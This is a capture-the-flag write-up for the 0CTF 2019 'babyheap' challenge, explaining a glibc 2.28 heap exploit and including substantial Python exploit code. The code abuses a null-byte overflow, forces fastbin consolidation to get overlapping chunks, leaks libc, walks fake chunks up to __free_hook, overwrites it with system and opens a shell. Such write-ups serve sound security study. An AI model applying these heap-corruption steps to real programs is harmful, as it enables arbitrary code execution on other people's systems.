0CTF Quals 2019: "babyheap" writeup

This challenge is yet another one of the “heap puzzle” kind. The interactions with the server usually are quite obvious however arbitrary restrictions are enforced. This task is no exception to that. Before going over the challenge and the solution, I quickly wanted to thank the author of this challenge for its well thought out design. All reads performed by the program took a predictable number of bytes from the input stream, so that synchronization could be skipped in some parts of the exploit. This massively speed up the time needed to perform all the necessary actions, as the script had not to wait for the quite large round-trip time too often.

Description

Like many other tasks, a small but potent way was given to interact with the heap directly. Here the actions were create, update, delete, and print. As additional restrictions, create was implemented using calloc and the size was capped at 0x58 (which results in 0x60 sized chunks). The update function did check the size, but added an extra 0 Byte at the end. Before the program starts, a chunk of size 0x1f000 is allocated, but not used for anything.

struct allocation {
	int in_use;
	size_t size;
	uint8_t *ptr;
}

The allocations are managed using an array of allocation structs, that is placed at a random location in memory using mmap and an offset into the mapped page. The array has 16 elements, thus at each point in time, there can only be 16 allocations the program manages.

Exploit

Since it is only possible to allocate chunks of size 0x60 and smaller, overflowing a 0 byte would be a fool’s errand as it would never result in a valid size field. As there is no other bug in this program, we need to find a way to utilize these 0 bytes. One exploitation technique utilizing such overflow is commonly referred to as forgotten chunk. It can be used to leverage that overflow to gain overlapping chunks, as the libc seemingly forgets one chunk placed in the middle of two free chunks being consolidated. This technique requires the size of the victim chunk to be at least a two-byte value.

The goal is to create such a situation but allocating a chunk of size 0x120 is not possible and chunks smaller that 0x80 are fast chunks, meaning that they are normally not consolidated at all, but rather stored in a singly linked list. However, there is a way to trigger the consolidation of fastbins, managing these chunks when the end of heap is hit. Instead of mindlessly extending the heap area, glibc will consolidate all fastbins and see if the request can then be served. If we can exhaust the heap area, we could trigger that consolidation, however we still have about two pages of memory we have to waste.

In theory we could waste 16 + 7 chunks of each size. The 7 comes from the fact that free puts the memory first into tcaches, yet calloc does not fetch memory from them. 16 chunks can be allocated at a time and freeing them puts them in a linked list, that would be used if we allocate the same size again, but not if another size is allocated. So, for each size (0x20, 0x40, 0x60 and 0x80) we can have 23 allocations. This gives a total of 0x1cc0 bytes, which is less than 0x100 short from the end of the heap.

This only leaves one option, shrinking the heap. I made sure to shrink the size of heap by exactly one page as else some checks in the libc may not pass (it did work the first time for me, so there also may not be a problem).

for i in range(16):
	add(s, 0x18, True)
	edit(s, i, b"SPARTA".ljust(0x18, b"A"))
for i in range(16):
	delete(s, i, True)

add(s, 0x38)
edit(s,0,b"SPARTA".ljust(0x38, b"A"))
delete(s, 0)
add(s, 0x48)
edit(s,0,b"SPARTA".ljust(0x48, b"A"))
delete(s, 0)
for i in range(2):
	add(s, 0x38)
for i in range(2):
	add(s, 0x38)
	edit(s, 2 + i,b"SPARTA".ljust(0x38, b"A"))
for i in range(4):
	delete(s, i)

After that has been done, the heap is set up, such that after consolidation a chunk of size 0x120 is created. To achieve this 5 adjacent chunks of size 0x60 are utilized. The second through fourth are used to build up the 0x120 sized chunk, the first one to overflow into that. The last one is at a later stage freed to consolidate backwards with the 0x120 sized chunk. Then the available heap memory is exhausted causing malloc_consolidate to be called. The preceding chunk is used to overflow into the size field, resulting in the prev_size field not being properly updated any more. To pass some malloc checks a fake chunk header was placed at where the 0x100 sized would end. Then from the 0x120 sized chunk two allocations are made and the first one is freed again. As a last step in the preparation, the chunks are put into the free list in a specific order, so that malloc_consolidate will first create an unsorted bin from the first chunk carved out from the 0x120 sized chunk, this results in a valid free chunk at the address, then the chunk behind the 0x120 sized chunk is consolidated, and the second chunk that was allocated from the 0x120 sized area gets swallowed.

# prepare consolidate area

for i in range(16):
	add(s, 0x58, True)
for i in range(5): # 5 tcache
	delete(s, i, True)
# 6 is base
# 7 - 9 are consolidated
# 10 is upper
# prepare fake next chunk
edit(s, 9, b"SPARTA".ljust(0x30, b"A") + struct.pack("<QQ", 0x100, 0x80))
for i in range(11, 16): # 7 tcache
	delete(s, i)
delete(s, 5)
for i in range(7, 10):
	delete(s, i)


allocs = [add(s, 0x48) for i in range(14)]
for a in allocs:
	delete(s, a)
print("[+] first consolidate")

# resize chunk
edit(s, 6, b"SPARTA".ljust(0x58, b"A"))
# holding allocations 6, 10 
allocs = [add(s, 0x58) for i in range(3)]
base = add(s, 0x58)
forgotten = add(s, 0x58) # 4
allocs += [add(s, 0x58) for i in range(14 - 4 - 3)]
for a in allocs + [10, base]:
	delete(s, a)

allocs = [add(s, 0x38) for i in range(10)]
for a in allocs:
	delete(s, a)
print("[+] second consolidate")

Just before allocating the overlapping chunk, the next pointer point to the libc as the memory is not managed by a fast bin. We use this situation to leak a libc address. The we allocate and deallocate the chunk, so it gets placed into the much easier to exploit fastbin, where we have control over the nxt pointer. While the task use glibc version 2.28 with tcaches enables, calloc does not allocate memory from them. Therefore, when overwriting the address in the nxt pointer, there must be a valid chunk header, aka size field. With the allocation size restrictions in place we unfortunately cannot use the highest bytes from pointer as size. Searching aroung the hooks however reveals another interesting location. Less the one page prior to the __free_hook appears to be a mangled pointer. While we would normally not be able to use pointer, the pointer mangling creates a random byte sequence from that pointer, and we only must guess the highest significant nibble of that mangled pointer

Now we only have this minute problem of being almost a page away from that juicy __free_hook. This problem was solved by walking the distance, step by step. Each step consists of 3 parts. First lifting off the foot, namely freeing the forgotten chunk so we can manipulate the free list, then we move the foot forward, by updating the free list to the end of the previously allocated area, where a valid size field was injected. Then we put the foot down by allocating twice and leave a shoe print in form of two fake chunk header. Two are required, as the next size field from the previous allocation is just outside the writable area of the last allocation, and the other one as a target for the next step. Carefully sneaking up to the free hook, once we are in range we jump on the prey by overwriting it with system. Freeing a chunk with content sh\x00 will yield a feast, after cating flag

## start walking
tramp = add(s, 0x58)
chg = add(s, 0x58) # get pwned or die trying

try:	
	edit(s, chg, b"a".rjust(0x52), False)
except ConnectionResetError:
	print("\x1b[4A\x1b[J", end="", flush=True)
	continue

print("[+] alloced into libc")

cur = None
ptr = None
for p in range(libc + tar_libc + 0x59, libc + free_hook_libc - 0xA0, 0x50):
	print("\r{:x} / {:x}".format(p, libc + free_hook_libc - 0x50), end="", flush=True)
	ptr = p
	delete(s, tramp)
	edit(s, forgotten, b"SPARTA".ljust(0x18, b"A") + struct.pack("<QQ", 0x61, p))
	tramp = add(s, 0x58)
	res = add(s, 0x58)
	edit(s, res, struct.pack("<QQ", 0, 0x51).ljust(0x40, b"\x00") + struct.pack("<QQ", 0, 0x61))
	if cur is not None:
		delete(s, cur)
	cur = res

pad = libc + free_hook_libc - 0x60 - (p + 0x10)
edit(s, cur, b"sh\x00".ljust(pad, b"\x00") + struct.pack("<QQ", 0, 0x61))
delete(s, tramp)
edit(s, forgotten, b"SPARTA".ljust(0x18, b"A") + struct.pack("<QQ", 0x61, libc + free_hook_libc - 0x60))
add(s, 0x58)
pwn = add(s, 0x58)
edit(s, pwn, b"\x00".ljust(0x50,b"\x00") + struct.pack("<Q", libc + system_libc))
delete(s, cur)
print("\r\x1b[K[+] overwritten __free_hook")

s.settimeout(1)
try:
	recv_all(s)
except socket.timeout as st:
	pass

s.send(b"cat flag\n")
print("[+] Flag: \x1b[1;32m{}\x1b[0m".format(recv_until(s, b"\n")[:-1].decode()))
s.send(b"exit\n")
s.send(b"5\n")